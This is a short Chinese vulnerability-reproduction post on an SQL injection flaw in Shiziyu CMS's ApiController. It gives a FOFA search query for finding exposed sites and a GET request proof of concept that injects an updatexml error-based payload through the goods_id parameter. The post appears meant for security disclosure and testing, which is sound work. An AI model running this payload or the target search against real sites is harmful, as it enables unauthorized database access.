当前位置: 首页 > article >正文

【漏洞复现】狮子鱼CMS某SQL注入漏洞

Nx01 产品简介

        狮子鱼CMS(Content Management System)是一种网站管理系统,它旨在帮助用户更轻松地创建和管理网站。该系统拥有用户友好的界面和丰富的功能,包括页面管理、博客、新闻、产品展示等。通过简单直观的管理界面,网站所有者可以方便地进行内容的发布、管理和布局。

Nx02 漏洞描述

        狮子鱼CMS存在一个安全漏洞,即ApiController.class.php参数过滤不严谨,这可能导致SQL注入漏洞。这意味着攻击者可能通过特定的输入来操纵SQL查询,从而获取敏感信息或执行恶意操作。

Nx03 产品主页

fofa-query: body="/seller.php?s=/Public/login"

Nx04 漏洞复现

POC:

GET /index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,md5(1),0x7e),1) HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate

Nx05 修复建议

建议联系软件厂商进行处理。


http://www.kler.cn/a/233968.html

相关文章:

  • nginx部署H5端程序与PC端进行区分及代理多个项目及H5内页面刷新出现404问题。
  • 想租用显卡训练自己的网络?AutoDL保姆级使用教程(PyCharm版)
  • DHCP与FTP
  • 使用electron-egg把vue项目在linux Ubuntu环境下打包并安装运行
  • 【教程】华南理工大学国际校区宿舍门锁声音设置
  • 【项目开发 | 跨域认证】JSON Web Token(JWT)
  • std::vector<cv::Mat>和unsigned char** in_pixels 互相转换
  • 一周学会Django5 Python Web开发-Django5创建项目(用PyCharm工具)
  • 【翻译】Processing安卓模式的安装使用及打包发布(内含中文版截图)
  • 酷开科技荣获消费者服务平台黑猫投诉“消费者服务之星”称号
  • 任意IOS16系统iPad/Iphone开启台前调度
  • OpenCV-35 查找轮廓
  • Nginx 配置 SSL证书
  • 【JavaScript】数组的创建和操作
  • Xampp中Xdebug的安装使用
  • 大数据思考:面对海量数据时,选择哪种模式才是更适合自己的?
  • 深入探索Redis:如何有效遍历海量数据集
  • 在容器镜像中为了安全为什么要删除 setuid 和 setgid?
  • Java图形化界面编程——菜单组件 笔记
  • 【EAI 014】Gato: A Generalist Agent
  • 1.6 Binance_interface API 现货交易账户
  • QT+OSG/osgEarth编译之八十二:osgdb_obj+Qt编译(一套代码、一套框架,跨平台编译,版本:OSG-3.6.5插件库osgdb_obj)
  • Mockito测试框架中的方法详解
  • JUnit实践教程——Java的单元测试框架
  • 程序设计语言的组成
  • SAP-PP-01-005工作中心